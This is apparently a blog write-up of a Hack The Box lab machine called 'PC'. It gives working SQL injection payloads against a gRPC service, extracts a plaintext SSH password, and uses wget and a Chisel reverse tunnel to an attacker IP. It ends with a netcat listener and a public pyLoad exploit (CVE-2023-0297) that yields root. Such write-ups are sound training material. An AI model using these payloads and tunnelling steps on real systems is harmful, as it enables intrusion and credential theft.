HackTheBox Writeup — PC

Fares Elsadek
6 min readJun 22, 2023

This box was presented at the Hack The Box in May 2023 by sau123.

Let’s get started!

Reconnaissance

Run a Nmap scan that scans all ports.

nmap -A -p- -Pn -T4 10.10.11.214

We get the following result.

Nmap scan report for pc.htb (10.10.11.214)
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data.

We have two ports open.

  1. port 22: running OpenSSH 8.2p1
  2. port 50051: unknown

Before we move on to enumeration, let’s make some mental notes about the scan results.

  1. The OpenSSH version that is running on port 22 is not associated with any critical vulnerabilities, so it’s unlikely that we gain initial access through this port, unless we find credentials.
  2. After some search I got that port 50051 is commonly used for grpc service.

gRPC (Google Remote Procedure Call) is an open-source, high-performance framework developed by Google that allows communication between client and server applications. It is designed to facilitate efficient and reliable data exchange between distributed systems and is commonly used in microservices architectures.

to deal with this service we will use Postman

Using the gRPC request interface

After adding the IP in the server URL field you will get three methods.

  1. LoginUser
  2. RegisterUser
  3. GetInfo

After trying to fuzz some data. I realized that I can request the data using the credentials “admin:admin”.This resulted in a response with a user token and an ID number.

the payload:

{
"username":"admin",
"password":"admin"
}

the result:

then I started using this info in the GetInfo method. I got “Will update soon”.

I realized there might be an SQL injection vulnerability in the parameter “id”. so I tried some payloads.

payload:

{
"id": "729 union SELECT username FROM accounts WHERE username NOT like 'sqlite_%' limit 1--"
}

result:

{
"message": "admin"
}

that’s nice I can get the first user in the accounts table. let’s try to get the second user and its password.

payload:

{
"id": "729 union SELECT username FROM accounts LIMIT 1 OFFSET 1;"
}

result:

{
"message": "sau"
}

that’s very cool we have got the second username let’s get his password.

payload:

{
"id": "729 union SELECT password FROM accounts where username='sau';"
}

result

{
"message": "HereIsYourPassWord1431"
}

so we have Sau’s password let’s try to login using ssh.

we have got the first flag :).

Privilege Escalation

List all the files on the system that have the SUID bit set.

find / -perm /4000 2>/dev/null

After doing some enumeration of these files I didn't find anything that will help me. so I tried to enumerate open ports using this command:

netstat -tulpn

I have got this result:

(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -

we have service running on port 8000, let’s do port forwarding to figure out what is it.

Port Forwarding — Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server.

You can grab a copy of Chisel from this GitHub repo here.

After downloading and extracting both of the above files, we should now have a 32-bit and 64-bit version of Chisel on our attacker machine.

Now that we have both versions on our attacker, we can quickly check the architecture of our victim using the following command:

uname -a

then we will download the 64-bit version on the victim's machine

and launch a simple local HTTP server on the attacker's machine.

python3 -m http.server 8080

then we will download the Chisel file in the victim’s machine using wget.

wget http://10.10.16.47:8080/chisel

Next we need to give this execute permissions, like so:

chmod +x ./chisel

Awesome, we have chisel on the victim, now we need to download chisel onto our attacker machine using the following command:

go install github.com/jpillora/chisel@latest

Alright, now we are all ready to setup our port forwarding.

With Chisel, we will be setting up a server on our attacker machine and a client on the victim machine. We can set the server up on any port; however, because chisel tunnels over HTTP, we may get stuffed by the firewall so its smart to use common ports like 80, 443, 21, etc.

chisel server -p 80 --reverse

The server is running, now we need to setup the port forwarding on the victim machine. We can send port 8000 to our attacker machine using the following command:

./chisel client 10.10.16.47:80 R:8000:127.0.0.1:8000

Here we can see the victim has connected to our attacker machine, and if we check the open ports using netstat again on our attacker machine, we should see 127.0.0.1:8000 running.

Access the server on the browser by entering the following URL: http://127.0.0.1:8000/

After trying default credentials without success, I conducted a search for vulnerabilities and discovered that pyLoad has a vulnerability (CVE-2023–0297)

After some searching I got an exploit to this CVE using Python here.

set up a listener on port 9999 on the local machine.

nc -lnvp 9999

using exploit.py to get the root:

python3 exploit.py -t http://127.0.0.1:8000 -I 10.10.16.47 -P 9999

and finally rooted :).

--

--